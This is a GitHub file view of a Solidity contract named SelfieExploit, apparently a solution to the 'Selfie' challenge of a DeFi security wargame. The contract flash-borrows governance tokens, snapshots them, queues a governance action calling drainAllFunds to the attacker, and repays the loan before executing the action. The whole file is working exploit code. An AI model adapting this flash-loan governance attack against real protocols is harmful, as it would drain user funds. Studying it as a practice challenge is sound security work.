-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathSelfieExploit.sol
60 lines (49 loc) · 1.41 KB
/
SelfieExploit.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface ISelfiePool {
function flashLoan(uint256 borrowAmount) external;
}
interface ISimpleGovernance {
function executeAction(uint256 actionId) external payable;
function queueAction(
address receiver,
bytes calldata data,
uint256 weiAmount
) external returns (uint256);
}
interface ITokenSnapshot {
function transfer(address recipient, uint256 amount)
external
returns (bool);
function snapshot() external returns (uint256);
}
contract SelfieExploit {
ISelfiePool public immutable pool;
address attacker;
ISimpleGovernance public immutable gov;
uint256 actionId;
constructor(
address _pool,
address _attacker,
address _gov
) {
pool = ISelfiePool(_pool);
attacker = _attacker;
gov = ISimpleGovernance(_gov);
}
function attack(uint256 borrowAmount) external {
pool.flashLoan(borrowAmount);
}
function receiveTokens(address token, uint256 borrowAmount) public {
ITokenSnapshot(token).snapshot();
actionId = gov.queueAction(
address(pool),
abi.encodeWithSignature("drainAllFunds(address)", attacker),
0
);
ITokenSnapshot(token).transfer(address(pool), borrowAmount);
}
function execute() external {
gov.executeAction(actionId);
}
}